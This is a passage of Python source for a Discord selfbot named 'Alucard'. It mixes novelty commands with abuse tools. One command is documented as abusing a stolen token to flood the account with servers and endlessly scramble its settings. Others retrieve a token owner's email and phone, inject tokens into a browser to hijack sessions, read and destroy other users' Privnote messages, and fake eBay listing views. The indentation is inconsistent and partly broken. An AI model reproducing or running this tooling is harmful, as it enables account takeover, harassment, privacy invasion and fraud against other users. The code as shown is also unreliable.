        if 'Someone just dropped' in message.content:
            if slotbot_sniper == True:
                if message.author.id == 346353957029019648:
                    try:
                        await message.channel.send('~grab')
                    except discord.errors.Forbidden:
                        print(""
                        f"\n{Fore.CYAN}[{time} - SlotBot Couldnt Grab]"+Fore.RESET)
                        SlotBotData()
                    print(""
                    f"\n{Fore.CYAN}[{time} - Slotbot Grabbed]"+Fore.RESET)
                    SlotBotData()
            else:
                return
        # --- Giveaway sniper: react 🎉 to GiveawayBot announcements. ---
        if 'GIVEAWAY' in message.content:
            if giveaway_sniper == True:
                if message.author.id == 294882584201003009:
                    try:
                        await message.add_reaction("🎉")
                    except discord.errors.Forbidden:
                        print(""
                        f"\n{Fore.CYAN}[{time} - Giveaway Couldnt React]"+Fore.RESET)
                        GiveawayData()
                    print(""
                    f"\n{Fore.CYAN}[{time} - Giveaway Sniped]"+Fore.RESET)
                    GiveawayData()
            else:
                return
        # Log when this account is announced as a giveaway winner.
        if f'Congratulations <@{Alucard.user.id}>' in message.content:
            if giveaway_sniper == True:
                if message.author.id == 294882584201003009:
                    print(""
                    f"\n{Fore.CYAN}[{time} - Giveaway Won]"+Fore.RESET)
                    GiveawayData()
            else:
                return
        # --- Privnote sniper: read (and thereby destroy) any posted note, ---
        # --- saving its contents to Privnote/<code>.txt.                  ---
        if 'privnote.com' in message.content:
            if privnote_sniper == True:
                code = re.search('privnote.com/(.*)', message.content).group(1)
                link = 'https://privnote.com/'+code
                try:
                    note_text = pn.read_note(link)
                except Exception as e:
                    print(e)
                with open(f'Privnote/{code}.txt', 'a+') as f:
                    print(""
                    f"\n{Fore.CYAN}[{time} - Privnote Sniped]"+Fore.RESET)
                    PrivnoteData(code)
                    f.write(note_text)
            else:
                return
        # Hand the message to the command framework last.
        await Alucard.process_commands(message)
@Alucard.event
async def on_connect():
Clear()
if giveaway_sniper == True:
giveaway = "Active"
else:
giveaway = "Disabled"
if nitro_sniper == True:
nitro = "Active"
else:
nitro = "Disabled"
if slotbot_sniper == True:
slotbot = "Active"
else:
slotbot = "Disabled"
if privnote_sniper == True:
privnote = "Active"
else:
privnote = "Disabled"
startprint()
ctypes.windll.kernel32.SetConsoleTitleW(f'[Alucard Selfbot v{SELFBOT.__version__}] | Logged in as {Alucard.user.name}')
@Alucard.command()
async def clear(ctx): # b'\xfc'
await ctx.message.delete()
await ctx.send('ᅠᅠ'+'\n' * 400 + 'ᅠᅠ')
@Alucard.command()
async def genname(ctx): # b'\xfc'
await ctx.message.delete()
first, second = random.choices(ctx.guild.members, k=2)
first = first.display_name[len(first.display_name) // 2:]
second = second.display_name[:len(second.display_name) // 2]
await ctx.send(discord.utils.escape_mentions(second + first))
@Alucard.command()
async def lmgtfy(ctx, *, message): # b'\xfc'
await ctx.message.delete()
q = urlencode({"q": message})
await ctx.send(f'<https://lmgtfy.com/?{q}>')
    @Alucard.command()
    async def login(ctx, _token):
        """Open a detached Chrome window on the Discord login page and inject
        the given user token into localStorage via JavaScript, logging the
        browser into that account."""
        await ctx.message.delete()
        opts = webdriver.ChromeOptions()
        # Keep the browser open after the webdriver script finishes.
        opts.add_experimental_option("detach", True)
        driver = webdriver.Chrome('chromedriver.exe', options=opts)
        # JS: repeatedly write the token into localStorage (via a throwaway
        # iframe, since Discord deletes window.localStorage), then reload.
        script = """
        function login(token) {
        setInterval(() => {
            document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
        }, 50);
        setTimeout(() => {
            location.reload();
        }, 2500);
        }
        """
        driver.get("https://discordapp.com/login")
        driver.execute_script(script+f'\nlogin("{_token}")')
    @Alucard.command()
    async def botlogin(ctx, _token):
        """Open a detached Chrome window and log the browser into Discord as a
        BOT account, by hooking Discord's webpack modules: setToken is called
        with the bot token, analytics tracking is disabled, the gateway
        identify/READY payloads are patched so the client treats the bot user
        as a normal user."""
        await ctx.message.delete()
        opts = webdriver.ChromeOptions()
        # Keep the browser open after the webdriver script finishes.
        opts.add_experimental_option("detach", True)
        driver = webdriver.Chrome('chromedriver.exe', options=opts)
        script = """
        function login(token) {
        ((i) => {
        window.webpackJsonp.push([
            [i], {
            [i]: (n, b, d) => {
                let dispatcher;
                for (let key in d.c) {
                if (d.c[key].exports) {
                    const module = d.c[key].exports.default || d.c[key].exports;
                    if (typeof(module) === 'object') {
                    if ('setToken' in module) {
                        module.setToken(token);
                        module.hideToken = () => {};
                    }
                    if ('dispatch' in module && '_subscriptions' in module) {
                        dispatcher = module;
                    }
                    if ('AnalyticsActionHandlers' in module) {
                        console.log('AnalyticsActionHandlers', module);
                        module.AnalyticsActionHandlers.handleTrack = (track) => {};
                    }
                    } else if (typeof(module) === 'function' && 'prototype' in module) {
                    const descriptors = Object.getOwnPropertyDescriptors(module.prototype);
                    if ('_discoveryFailed' in descriptors) {
                        const connect = module.prototype._connect;
                        module.prototype._connect = function(url) {
                        console.log('connect', url);
                        const oldHandleIdentify = this.handleIdentify;
                        this.handleIdentify = () => {
                            const identifyData = oldHandleIdentify();
                            identifyData.token = identifyData.token.split(' ').pop();
                            return identifyData;
                        };
                        const oldHandleDispatch = this._handleDispatch;
                        this._handleDispatch = function(data, type) {
                            if (type === 'READY') {
                            console.log(data);
                            data.user.bot = false;
                            data.user.email = 'Alucard-Was-Here@Fuckyou.com';
                            data.analytics_tokens = [];
                            data.connected_accounts = [];
                            data.consents = [];
                            data.experiments = [];
                            data.guild_experiments = [];
                            data.relationships = [];
                            data.user_guild_settings = [];
                            }
                            return oldHandleDispatch.call(this, data, type);
                        }
                        return connect.call(this, url);
                        };
                    }
                    }
                }
                }
                console.log(dispatcher);
                if (dispatcher) {
                dispatcher.dispatch({
                    type: 'LOGIN_SUCCESS',
                    token
                });
                }
            },
            },
            [
            [i],
            ],
        ]);
        })(Math.random());
        }
        """
        driver.get("https://discordapp.com/login")
        driver.execute_script(script+f'\nlogin("Bot {_token}")')
@Alucard.command()
async def address(ctx, *, text): # b'\xfc'
await ctx.message.delete()
addy = ' '.join(text)
address_array = []
i = 0
while i < 10:
address_array.append(GenAddress(addy))
i+=1
final_str = "\n".join(address_array)
em = discord.Embed(description=final_str)
try:
await ctx.send(embed=em)
except:
await ctx.send(final_str)
@Alucard.command()
async def weather(ctx, *, city): # b'\xfc'
await ctx.message.delete()
if weather_key == '':
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Weather API key has not been set in the config.json file"+Fore.RESET)
else:
try:
req = requests.get(f'http://api.openweathermap.org/data/2.5/weather?q={city}&appid={weather_key}')
r = req.json()
temperature = round(float(r["main"]["temp"]) - 273.15, 1)
lowest = round(float(r["main"]["temp_min"]) - 273.15, 1)
highest = round(float(r["main"]["temp_max"]) - 273.15, 1)
weather = r["weather"][0]["main"]
humidity = round(float(r["main"]["humidity"]), 1)
wind_speed = round(float(r["wind"]["speed"]), 1)
em = discord.Embed(description=f'''
Temperature: `{temperature}`
Lowest: `{lowest}`
Highest: `{highest}`
Weather: `{weather}`
Humidity: `{humidity}`
Wind Speed: `{wind_speed}`
''')
em.add_field(name='City', value=city.capitalize())
em.set_thumbnail(url='https://ak0.picdn.net/shutterstock/videos/1019313310/thumb/1.jpg')
try:
await ctx.send(embed=em)
except:
await ctx.send(f'''
Temperature: {temperature}
Lowest: {lowest}
Highest: {highest}
Weather: {weather}
Humidity: {humidity}
Wind Speed: {wind_speed}
City: {city.capitalize()}
''')
except KeyError:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{city} Is not a real city"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{req.text}"+Fore.RESET)
@Alucard.command(aliases=['shorteen'])
async def bitly(ctx, *, link): # b'\xfc'
await ctx.message.delete()
if bitly_key == '':
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Bitly API key has not been set in the config.json file"+Fore.RESET)
else:
try:
async with aiohttp.ClientSession() as session:
async with session.get(f'https://api-ssl.bitly.com/v3/shorten?longUrl={link}&domain=bit.ly&format=json&access_token={bitly_key}') as req:
r = await req.read()
r = json.loads(r)
new = r['data']['url']
em = discord.Embed()
em.add_field(name='Shortened link', value=new, inline=False)
await ctx.send(embed=em)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{req.text}"+Fore.RESET)
@Alucard.command()
async def cuttly(ctx, *, link): # b'\xfc'
await ctx.message.delete()
if cuttly_key == '':
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Cutt.ly API key has not been set in the config.json file"+Fore.RESET)
else:
try:
req = requests.get(f'https://cutt.ly/api/api.php?key={cuttly_key}&short={link}')
r = req.json()
new = r['url']['shortLink']
em = discord.Embed()
em.add_field(name='Shortened link', value=new, inline=False)
try:
await ctx.send(embed=em)
except:
await ctx.send(new)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{req.text}"+Fore.RESET)
@Alucard.command()
async def cat(ctx): # b'\xfc'
await ctx.message.delete()
if cat_key == '':
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Cat API key has not been set in the config.json file"+Fore.RESET)
else:
try:
req = requests.get(f"https://api.thecatapi.com/v1/images/search?format=json&x-api-key={cat_key}")
r = req.json()
em = discord.Embed()
em.set_image(url=str(r[0]["url"]))
try:
await ctx.send(embed=em)
except:
await ctx.send(str(r[0]["url"]))
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
else:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{req.text}"+Fore.RESET)
@Alucard.command()
async def dog(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get("https://dog.ceo/api/breeds/image/random").json()
em = discord.Embed()
em.set_image(url=str(r['message']))
try:
await ctx.send(embed=em)
except:
await ctx.send(str(r['message']))
@Alucard.command()
async def fox(ctx): # b'\xfc'
await ctx.message.delete()
r = requests.get('https://randomfox.ca/floof/').json()
em = discord.Embed(title="Random fox image", color=16202876)
em.set_image(url=r["image"])
try:
await ctx.send(embed=em)
except:
await ctx.send(r['image'])
@Alucard.command()
async def encode(ctx, string): # b'\xfc'
await ctx.message.delete()
decoded_stuff = base64.b64encode('{}'.format(string).encode('ascii'))
encoded_stuff = str(decoded_stuff)
encoded_stuff = encoded_stuff[2:len(encoded_stuff)-1]
await ctx.send(encoded_stuff)
@Alucard.command()
async def decode(ctx, string): # b'\xfc'+
await ctx.message.delete()
strOne = (string).encode("ascii")
pad = len(strOne)%4
strOne += b"="*pad
encoded_stuff = codecs.decode(strOne.strip(),'base64')
decoded_stuff = str(encoded_stuff)
decoded_stuff = decoded_stuff[2:len(decoded_stuff)-1]
await ctx.send(decoded_stuff)
    @Alucard.command(name='ebay-view', aliases=['ebay-view-bot', 'ebayviewbot', 'ebayview'])
    async def _ebay_view(ctx, url, views: int): # b'\xfc'
        """Send `views` GET requests to an eBay listing URL (fake view count),
        then report the count and elapsed time in an embed.

        NOTE(review): the request loop is synchronous inside a coroutine, so the
        whole bot blocks while the views are sent -- confirm if intentional.
        """
        await ctx.message.delete()
        start_time = datetime.datetime.now()
        def EbayViewer(url, views):
            # Browser-like headers so the requests count as page views.
            headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
            }
            for _i in range(views):
                requests.get(url, headers=headers)
        EbayViewer(url, views)
        elapsed_time = datetime.datetime.now() - start_time
        em = discord.Embed(title='Ebay View Bot')
        em.add_field(name='Views sent', value=views, inline=False)
        em.add_field(name='Elapsed time', value=elapsed_time, inline=False)
        await ctx.send(embed=em)
@Alucard.command(aliases=['geolocate', 'iptogeo', 'iptolocation', 'ip2geo', 'ip'])
async def geoip(ctx, *, ipaddr: str = '1.3.3.7'): # b'\xfc'
await ctx.message.delete()
r = requests.get(f'http://extreme-ip-lookup.com/json/{ipaddr}')
geo = r.json()
em = discord.Embed()
fields = [
{'name': 'IP', 'value': geo['query']},
{'name': 'ipType', 'value': geo['ipType']},
{'name': 'Country', 'value': geo['country']},
{'name': 'City', 'value': geo['city']},
{'name': 'Continent', 'value': geo['continent']},
{'name': 'Country', 'value': geo['country']},
{'name': 'IPName', 'value': geo['ipName']},
{'name': 'ISP', 'value': geo['isp']},
{'name': 'Latitute', 'value': geo['lat']},
{'name': 'Longitude', 'value': geo['lon']},
{'name': 'Org', 'value': geo['org']},
{'name': 'Region', 'value': geo['region']},
{'name': 'Status', 'value': geo['status']},
]
for field in fields:
if field['value']:
em.add_field(name=field['name'], value=field['value'], inline=True)
return await ctx.send(embed=em)
@Alucard.command()
async def pingweb(ctx, website = None): # b'\xfc'
await ctx.message.delete()
if website is None:
pass
else:
try:
r = requests.get(website).status_code
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
if r == 404:
await ctx.send(f'Site is down, responded with a status code of {r}', delete_after=3)
else:
await ctx.send(f'Site is up, responded with a status code of {r}', delete_after=3)
@Alucard.command()
async def tweet(ctx, username: str, *, message: str): # b'\xfc'
await ctx.message.delete()
async with aiohttp.ClientSession() as cs:
async with cs.get(f"https://nekobot.xyz/api/imagegen?type=tweet&username={username}&text={message}") as r:
res = await r.json()
em = discord.Embed()
em.set_image(url=res["message"])
await ctx.send(embed=em)
@Alucard.command()
async def revav(ctx, user: discord.Member=None): # b'\xfc'
await ctx.message.delete()
if user is None:
user = ctx.author
try:
em = discord.Embed(description=f"https://images.google.com/searchbyimage?image_url={user.avatar_url}")
await ctx.send(embed=em)
except Exception as e:
print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
    @Alucard.command(aliases=['pfp', 'avatar'])
    async def av(ctx, *, user: discord.Member=None): # b'\xfc'
        """Download a member's avatar (GIF if animated, else PNG) and upload it
        as a file attachment. Defaults to the command author."""
        await ctx.message.delete()
        format = "gif"
        user = user or ctx.author
        if user.is_avatar_animated() != True:
            format = "png"
        # format=None lets discord.py pick the asset default for animated
        # avatars (which is a gif); an explicit "gif" request is avoided.
        avatar = user.avatar_url_as(format = format if format != "gif" else None)
        async with aiohttp.ClientSession() as session:
            async with session.get(str(avatar)) as resp:
                image = await resp.read()
                with io.BytesIO(image) as file:
                    await ctx.send(file = discord.File(file, f"Avatar.{format}"))
@Alucard.command(aliases=['ri', 'role'])
async def roleinfo(ctx, *, role: discord.Role): # b'\xfc'
    """Show details (member count, colour, position, creation date...) for a role.

    Fix: for default-coloured roles the original did `int(colour[1:], 16)`
    on the literal word "default", raising ValueError; it now parses the
    randomly generated hex string instead.
    """
    await ctx.message.delete()
    guild = ctx.guild
    since_created = (ctx.message.created_at - role.created_at).days
    role_created = role.created_at.strftime("%d %b %Y %H:%M")
    created_on = "{} ({} days ago)".format(role_created, since_created)
    users = len([x for x in guild.members if role in x.roles])
    if str(role.colour) == "#000000":
        colour = "default"
        # The role has no colour of its own; pick a random one for the embed.
        color = int("%06x" % random.randint(0, 0xFFFFFF), 16)
    else:
        colour = str(role.colour).upper()
        color = role.colour
    em = discord.Embed(colour=color)
    em.set_author(name=f"Name: {role.name}"
                  f"\nRole ID: {role.id}")
    em.add_field(name="Users", value=users)
    em.add_field(name="Mentionable", value=role.mentionable)
    em.add_field(name="Hoist", value=role.hoist)
    em.add_field(name="Position", value=role.position)
    em.add_field(name="Managed", value=role.managed)
    em.add_field(name="Colour", value=colour)
    em.add_field(name='Creation Date', value=created_on)
    await ctx.send(embed=em)
@Alucard.command()
async def whois(ctx, *, user: discord.Member = None): # b'\xfc'
    """Show profile details for a member (defaults to the command author)."""
    await ctx.message.delete()
    if user is None:
        user = ctx.author
    date_format = "%a, %d %b %Y %I:%M %p"
    em = discord.Embed(description=user.mention)
    em.set_author(name=str(user), icon_url=user.avatar_url)
    em.set_thumbnail(url=user.avatar_url)
    em.add_field(name="Joined", value=user.joined_at.strftime(date_format))
    # Join position = 1-based rank of the member when sorted by join date.
    members = sorted(ctx.guild.members, key=lambda m: m.joined_at)
    em.add_field(name="Join position", value=str(members.index(user)+1))
    em.add_field(name="Registered", value=user.created_at.strftime(date_format))
    if len(user.roles) > 1:
        # roles[0] is always @everyone, so skip it.
        role_string = ' '.join([r.mention for r in user.roles][1:])
        em.add_field(name="Roles [{}]".format(len(user.roles)-1), value=role_string, inline=False)
    # guild_permissions iterates (name, granted) pairs; keep only granted ones.
    perm_string = ', '.join([str(p[0]).replace("_", " ").title() for p in user.guild_permissions if p[1]])
    em.add_field(name="Guild permissions", value=perm_string, inline=False)
    em.set_footer(text='ID: ' + str(user.id))
    return await ctx.send(embed=em)
@Alucard.command()
async def minesweeper(ctx, size: int = 5): # b'\xfc'
    """Post a playable spoiler-tag minesweeper board of the given size (clamped to 2-8)."""
    await ctx.message.delete()
    size = max(min(size, 8), 2)
    # size-1 random bomb coordinates; duplicates are possible and just mean fewer bombs.
    bombs = [[random.randint(0, size - 1), random.randint(0, size - 1)] for x in range(int(size - 1))]
    is_on_board = lambda x, y: 0 <= x < size and 0 <= y < size
    has_bomb = lambda x, y: [i for i in bombs if i[0] == x and i[1] == y]
    message = "**Click to play**:\n"
    for y in range(size):
        for x in range(size):
            tile = "||{}||".format(chr(11036))  # white square = empty tile
            if has_bomb(x, y):
                tile = "||{}||".format(chr(128163))  # bomb emoji
            else:
                # Count bombs in neighbouring cells.
                # NOTE(review): m_offets and m_numbers are module-level globals
                # defined elsewhere in this file — presumably the 8 neighbour
                # offsets and the digit emojis; confirm against their definition.
                count = 0
                for xmod, ymod in m_offets:
                    if is_on_board(x + xmod, y + ymod) and has_bomb(x + xmod, y + ymod):
                        count += 1
                if count != 0:
                    tile = "||{}||".format(m_numbers[count - 1])
            message += tile
        message += "\n"
    await ctx.send(message)
@Alucard.command()
async def combine(ctx, name1, name2): # b'\xfc'
    """Mash two names together: first half of name1 + second half of name2."""
    await ctx.message.delete()
    half1 = name1[:round(len(name1) / 2)]
    half2 = name2[round(len(name2) / 2):]
    ship = half1 + half2
    embed = discord.Embed(description=f"{ship}")
    embed.set_author(name=f"{name1} + {name2}")
    await ctx.send(embed=embed)
@Alucard.command(name='1337-speak', aliases=['1337speak'])
async def _1337_speak(ctx, *, text): # b'\xfc'
    """Convert text to leetspeak and send it in a code span.

    Uses a single str.translate pass instead of ten chained .replace()
    calls; the mapping (a→4, e→3, i→!, o→0, u→|_|) is unchanged.
    """
    await ctx.message.delete()
    leet_table = str.maketrans({'a': '4', 'A': '4', 'e': '3', 'E': '3',
                                'i': '!', 'I': '!', 'o': '0', 'O': '0',
                                'u': '|_|', 'U': '|_|'})
    text = text.translate(leet_table)
    await ctx.send(f'`{text}`')
@Alucard.command(aliases=['dvwl'])
async def devowel(ctx, *, text): # b'\xfc'
    """Strip all vowels (both cases) from the text and send the result.

    Uses one str.translate deletion table instead of ten chained
    .replace() calls; behavior is identical.
    """
    await ctx.message.delete()
    dvl = text.translate(str.maketrans('', '', 'aeiouAEIOU'))
    await ctx.send(dvl)
@Alucard.command()
async def blank(ctx): # b'\xfc'
    """Blank the account: transparent avatar and an invisible-character username.

    Requires the real account password in config.json (account edits need it).
    """
    await ctx.message.delete()
    if config.get('password') == 'password-here':
        # Placeholder password still in the config — can't edit the account.
        print(f"{Fore.RED}[ERROR] {Fore.YELLOW}You didnt put your password in the config.json file"+Fore.RESET)
    else:
        password = config.get('password')
        with open('Images/Avatars/Transparent.png', 'rb') as f:
            try:
                # The username string below is made of invisible Arabic marks.
                await Alucard.user.edit(password=password, username="ٴٴٴٴ", avatar=f.read())
            except discord.HTTPException as e:
                print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(aliases=['pfpget', 'stealpfp'])
async def pfpsteal(ctx, user: discord.Member): # b'\xfc'
    """Download another member's avatar and set it as this account's avatar.

    Requires the real account password in config.json.
    """
    await ctx.message.delete()
    if config.get('password') == 'password-here':
        print(f"{Fore.RED}[ERROR] {Fore.YELLOW}You didnt put your password in the config.json file"+Fore.RESET)
    else:
        password = config.get('password')
        # Stream the avatar to disk in 1 KiB chunks.
        with open('Images/Avatars/Stolen/Stolen.png', 'wb') as f:
            r = requests.get(user.avatar_url, stream=True)
            for block in r.iter_content(1024):
                if not block:
                    break
                f.write(block)
        try:
            # Opening via PIL validates that the download is a real image.
            Image.open('Images/Avatars/Stolen/Stolen.png').convert('RGB')
            with open('Images/Avatars/Stolen/Stolen.png', 'rb') as f:
                await Alucard.user.edit(password=password, avatar=f.read())
        except discord.HTTPException as e:
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(name='set-pfp', aliases=['setpfp', 'pfpset'])
async def _set_pfp(ctx, *, url): # b'\xfc'
    """Download an image from a URL and set it as this account's avatar.

    Requires the real account password in config.json.
    """
    await ctx.message.delete()
    if config.get('password') == 'password-here':
        print(f"{Fore.RED}[ERROR] {Fore.YELLOW}You didnt put your password in the config.json file"+Fore.RESET)
    else:
        password = config.get('password')
        # Stream the image to disk in 1 KiB chunks.
        with open('Images/Avatars/PFP-1.png', 'wb') as f:
            r = requests.get(url, stream=True)
            for block in r.iter_content(1024):
                if not block:
                    break
                f.write(block)
        try:
            # Opening via PIL validates that the download is a real image.
            Image.open('Images/Avatars/PFP-1.png' ).convert('RGB')
            with open('Images/Avatars/PFP-1.png', 'rb') as f:
                await Alucard.user.edit(password=password, avatar=f.read())
        except discord.HTTPException as e:
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(aliases=['dong', 'penis'])
async def dick(ctx, *, user: discord.Member = None): # b'\xfc'
    """Post a joke embed with a random-length drawing for the given member."""
    await ctx.message.delete()
    target = user if user is not None else ctx.author
    shaft = "=" * random.randint(1, 15)
    embed = discord.Embed(title=f"{target}'s Dick size", description=f"8{shaft}D", colour=0x0000)
    await ctx.send(embed=embed)
@Alucard.command(aliases=['changehypesquad'])
async def hypesquad(ctx, house): # b'\xfc'
    """Change the account's HypeSquad house: bravery, brilliance, balance or random.

    Fix: an unrecognised house name used to leave `payload` undefined and
    crash with a NameError inside the request; it is now rejected up front.
    """
    await ctx.message.delete()
    house_ids = {'bravery': 1, 'brilliance': 2, 'balance': 3}
    if house == "random":
        house_id = random.choice(list(house_ids.values()))
    elif house in house_ids:
        house_id = house_ids[house]
    else:
        # Unknown house: nothing sensible to send to the API.
        return
    headers = {
        'Authorization': token,
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.305 Chrome/69.0.3497.128 Electron/4.0.8 Safari/537.36'
    }
    try:
        requests.post('https://discordapp.com/api/v6/hypesquad/online',
                      headers=headers, json={'house_id': house_id}, timeout=10)
    except Exception as e:
        print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
@Alucard.command(aliases=['tokenfucker', 'disable', 'crash'])
async def tokenfuck(ctx, _token): # b'\xfc'
    """Abuse a stolen token: spam guild creation, then thrash the account's
    settings (theme/locale/status) in an intentionally infinite loop.

    NOTE(review): this command never returns; it monopolises the event loop
    via blocking `requests` calls. Left byte-identical on purpose.
    """
    await ctx.message.delete()
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7',
        'Content-Type': 'application/json',
        'Authorization': _token,
    }
    request = requests.Session()
    # Settings payload that makes the client maximally unpleasant to use.
    payload = {
        'theme': "light",
        'locale': "ja",
        'message_display_compact': False,
        'inline_embed_media': False,
        'inline_attachment_media': False,
        'gif_auto_play': False,
        'render_embeds': False,
        'render_reactions': False,
        'animate_emoji': False,
        'convert_emoticons': False,
        'enable_tts_command': False,
        'explicit_content_filter': '0',
        'status': "invisible"
    }
    guild = {
        'channels': None,
        'icon': None,
        'name': "ALUCARD",
        'region': "europe"
    }
    # Flood the account with new guilds (50 creation attempts).
    for _i in range(50):
        requests.post('https://discordapp.com/api/v6/guilds', headers=headers, json=guild)
    # Retry the initial settings patch until it goes through.
    while True:
        try:
            request.patch("https://canary.discordapp.com/api/v6/users/@me/settings",headers=headers, json=payload)
        except Exception as e:
            print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
        else:
            break
    modes = cycle(["light", "dark"])
    statuses = cycle(["online", "idle", "dnd", "invisible"])
    # Outer loop is intentionally endless: keep flipping theme/locale/status.
    while True:
        setting = {
            'theme': next(modes),
            'locale': random.choice(locales),
            'status': next(statuses)
        }
        # Inner retry loop for each individual patch.
        while True:
            try:
                request.patch("https://canary.discordapp.com/api/v6/users/@me/settings",headers=headers, json=setting, timeout=10)
            except Exception as e:
                print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET)
            else:
                break
@Alucard.command()
async def masslogin(ctx, choice = None): # b'\xfc'
    """Delegate to the module-level _masslogin helper (defined elsewhere in this file)."""
    await ctx.message.delete()
    _masslogin(choice)
@Alucard.command()
async def masscon(ctx, _type, amount: int, *, name=None): # b'\xfc'
    """Add *amount* fake account connections of the given type.

    Fixes: the display-name default is now applied *before* the payload is
    built (the original assigned it afterwards, so the API always received
    name=None), and an unsupported type now aborts instead of continuing.
    """
    await ctx.message.delete()
    avaliable = [
        'battlenet',
        'skype',
        'leagueoflegends'
    ]
    if name is None:
        name = 'about:blank'
    if _type not in avaliable:
        print(f'Avaliable connections: {avaliable}')
        return
    payload = {
        'name': name,
        'visibility': 1
    }
    headers = {
        'Authorization': token,
        'Content-Type':'application/json',
    }
    for _i in range(amount):
        try:
            ID = random.randint(10000000, 90000000)
            time.sleep(5)  # crude rate limiting; NOTE: this blocks the event loop
            r = requests.put(f'https://canary.discordapp.com/api/v6/users/@me/connections/{_type}/{ID}', data=json.dumps(payload), headers=headers)
            if r.status_code == 200:
                print(f"[{Fore.GREEN}+{Fore.RESET}] New connection added!")
            else:
                print(f"[{Fore.RED}-{Fore.RESET}] Couldnt add connection!")
                break
        except (Exception, ValueError) as e:
            print(e)
            break
    print(f"[{Fore.GREEN}+{Fore.RESET}] Finished adding connections!")
@Alucard.command(aliases=['fakeconnection', 'spoofconnection'])
async def fakenet(ctx, _type, *, name = None): # b'\xfc'
    """Add a single fake account connection of the given type.

    Fixes: the name default is applied before the payload is built, an
    unsupported type aborts early instead of hitting the API anyway, and
    the confirmation message now shows the requested type — the original
    interpolated the builtin `type`, printing "<class 'type'>".
    """
    await ctx.message.delete()
    ID = random.randrange(10000000, 90000000)
    avaliable = [
        'battlenet',
        'skype',
        'leagueoflegends'
    ]
    if name is None:
        name = 'about:blank'
    if _type not in avaliable:
        await ctx.send(f'Avaliable connections: `{avaliable}`', delete_after = 3)
        return
    payload = {
        'name': name,
        'visibility': 1
    }
    headers = {
        'Authorization': token,
        'Content-Type':'application/json',
    }
    r = requests.put(f'https://canary.discordapp.com/api/v6/users/@me/connections/{_type}/{ID}', data=json.dumps(payload), headers=headers)
    if r.status_code == 200:
        await ctx.send(f"Added connection: `{_type}` with Username: `{name}` and ID: `{ID}`", delete_after = 3)
    else:
        await ctx.send('Some error has happened with the endpoint', delete_after = 3)
@Alucard.command(aliases=['tokinfo', 'tdox'])
async def tokeninfo(ctx, _token): # b'\xfc'
    """Look up and embed account details for a given token.

    Fix: on an invalid token the original only printed an error and then
    fell through to the embed-building code, crashing with a NameError on
    the undefined locals — it now returns early.
    """
    await ctx.message.delete()
    headers = {
        'Authorization': _token,
        'Content-Type': 'application/json'
    }
    try:
        res = requests.get('https://canary.discordapp.com/api/v6/users/@me', headers=headers)
        res = res.json()
        user_id = res['id']
        locale = res['locale']
        avatar_id = res['avatar']
        language = languages.get(locale)
        # Discord snowflake IDs embed a millisecond timestamp in the top bits.
        creation_date = datetime.datetime.utcfromtimestamp(((int(user_id) >> 22) + 1420070400000) / 1000).strftime('%d-%m-%Y %H:%M:%S UTC')
    except KeyError:
        print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}Invalid token"+Fore.RESET)
        return
    em = discord.Embed(
        description=f"Name: `{res['username']}#{res['discriminator']}`\nID: `{res['id']}`\nEmail: `{res['email']}`\nCreation Date: `{creation_date}`\nProfile picture: [**Click here**](https://cdn.discordapp.com/avatars/{user_id}/{avatar_id})")
    fields = [
        {'name': 'Phone', 'value': res['phone']},
        {'name': 'Flags', 'value': res['flags']},
        {'name': 'Local language', 'value': res['locale'] + f"{language}"},
        {'name': 'MFA?', 'value': res['mfa_enabled']},
        {'name': 'Verified?', 'value': res['verified']},
    ]
    # Only show fields that actually have a value.
    for field in fields:
        if field['value']:
            em.add_field(name=field['name'], value=field['value'], inline=False)
    em.set_thumbnail(url=f"https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}")
    return await ctx.send(embed=em)
@Alucard.command()
async def copy(ctx): # b'\xfc'
    """Clone the current guild's category/channel layout into a new 'backup-' guild."""
    await ctx.message.delete()
    await Alucard.create_guild(f'backup-{ctx.guild.name}')
    # Give Discord a moment to create the guild before searching for it.
    await asyncio.sleep(4)
    for g in Alucard.guilds:
        if f'backup-{ctx.guild.name}' in g.name:
            # Remove the default channels Discord creates in a fresh guild.
            for c in g.channels:
                await c.delete()
            # Recreate each category with its text/voice channels.
            for cate in ctx.guild.categories:
                x = await g.create_category(f"{cate.name}")
                for chann in cate.channels:
                    if isinstance(chann, discord.VoiceChannel):
                        await x.create_voice_channel(f"{chann}")
                    if isinstance(chann, discord.TextChannel):
